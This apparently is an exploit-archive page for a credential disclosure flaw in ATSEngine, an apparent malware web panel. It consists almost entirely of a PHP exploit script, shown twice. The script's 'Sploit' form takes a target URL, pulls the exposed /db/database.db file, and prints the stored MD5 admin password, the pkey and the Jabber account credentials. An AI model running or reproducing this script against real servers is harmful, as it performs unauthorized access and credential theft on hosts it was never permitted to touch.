Xyl2k/ATSEngine credential disclosure vulnerability

## ATSEngine credential disclosure vulnerability
<pre>
<?php
    $url = getURL();

    if ($url !== NULL) {
        $database = @file_get_contents($url . '/db/database.db');

        if ($database !== FALSE) {
            file_put_contents('tmp.db', $database);

            $password_md5     = getOption('password_md5');
            $pkey             = getOption('pkey');
            $jabber_on        = getOption('jabber_on');
            $jabber_sender    = getOption('jabber_sender');
            $jabber_password  = getOption('jabber_password');
            $jabber_port      = getOption('jabber_port');
            $jabber_recipient = getOption('jabber_recepient');

            writeLine('URL:          ' . htmlentities($url));
            writeLine('MD5 password: ' . htmlentities($password_md5));
            writeLine('pkey:         ' . htmlentities($pkey));
            writeLine('Jabber        ' . htmlentities($jabber_on));
            writeLine('Sender:       ' . htmlentities($jabber_sender));
            writeLine('Password:     ' . htmlentities($jabber_password));
            writeLine('Port:         ' . htmlentities($jabber_port));
            writeLine('Recipient:    ' . htmlentities($jabber_recipient));

            unlink('tmp.db');
        }
        else {
            writeLine('Cannot get database...');
        }

        writeLine('');
        echo('<a href="' . basename($_SERVER['PHP_SELF']) . '">Back</a>');
    }
    else {
?>
<form method="POST">
<label for="url">URL:</label> <input id="url" name="url" type="url" value="http://secureserver02792.com/bncadmin/" />
<input type="submit" value="Sploit" />
</form>
<?php
    }

    function getURL() {
        global $_POST;

        if (isset($_POST['url'])      &&
            !is_array($_POST['url'])  &&
            is_string($_POST['url'])  &&
            strlen($_POST['url']) > 0 &&
            filter_var($_POST['url'], FILTER_VALIDATE_URL)) {
            return $_POST['url'];
        }

        return NULL;
    }

    function writeLine($str) {
        echo($str . "\n");
    }

    function getOption($option) {
        $db     = new SQLite3('tmp.db');
        $sql    = 'SELECT value AS result FROM options WHERE param="' . $option . '"';
        $result = $db-> querySingle($sql, true);

        $db-> close();

        return sizeof($result) > 0 ? $result['result'] : '';
    }
?>
</pre>
	<pre>
	<?php
	$url = getURL();

	if ($url !== NULL) {
	$database = @file_get_contents($url . '/db/database.db');

	if ($database !== FALSE) {
	file_put_contents('tmp.db', $database);

	$password_md5 = getOption('password_md5');
	$pkey = getOption('pkey');
	$jabber_on = getOption('jabber_on');
	$jabber_sender = getOption('jabber_sender');
	$jabber_password = getOption('jabber_password');
	$jabber_port = getOption('jabber_port');
	$jabber_recipient = getOption('jabber_recepient');

	writeLine('URL: ' . htmlentities($url));
	writeLine('MD5 password: ' . htmlentities($password_md5));
	writeLine('pkey: ' . htmlentities($pkey));
	writeLine('Jabber ' . htmlentities($jabber_on));
	writeLine('Sender: ' . htmlentities($jabber_sender));
	writeLine('Password: ' . htmlentities($jabber_password));
	writeLine('Port: ' . htmlentities($jabber_port));
	writeLine('Recipient: ' . htmlentities($jabber_recipient));

	unlink('tmp.db');
	}
	else {
	writeLine('Cannot get database...');
	}

	writeLine('');
	echo('<a href="' . basename($_SERVER['PHP_SELF']) . '">Back</a>');
	}
	else {
	?>
	<form method="POST">
	<label for="url">URL:</label> <input id="url" name="url" type="url" value="http://secureserver02792.com/bncadmin/" />
	<input type="submit" value="Sploit" />
	</form>
	<?php
	}

	function getURL() {
	global $_POST;

	if (isset($_POST['url']) &&
	!is_array($_POST['url']) &&
	is_string($_POST['url']) &&
	strlen($_POST['url']) > 0 &&
	filter_var($_POST['url'], FILTER_VALIDATE_URL)) {
	return $_POST['url'];
	}

	return NULL;
	}

	function writeLine($str) {
	echo($str . "\n");
	}

	function getOption($option) {
	$db = new SQLite3('tmp.db');
	$sql = 'SELECT value AS result FROM options WHERE param="' . $option . '"';
	$result = $db-> querySingle($sql, true);

	$db-> close();

	return sizeof($result) > 0 ? $result['result'] : '';
	}
	?>
	</pre>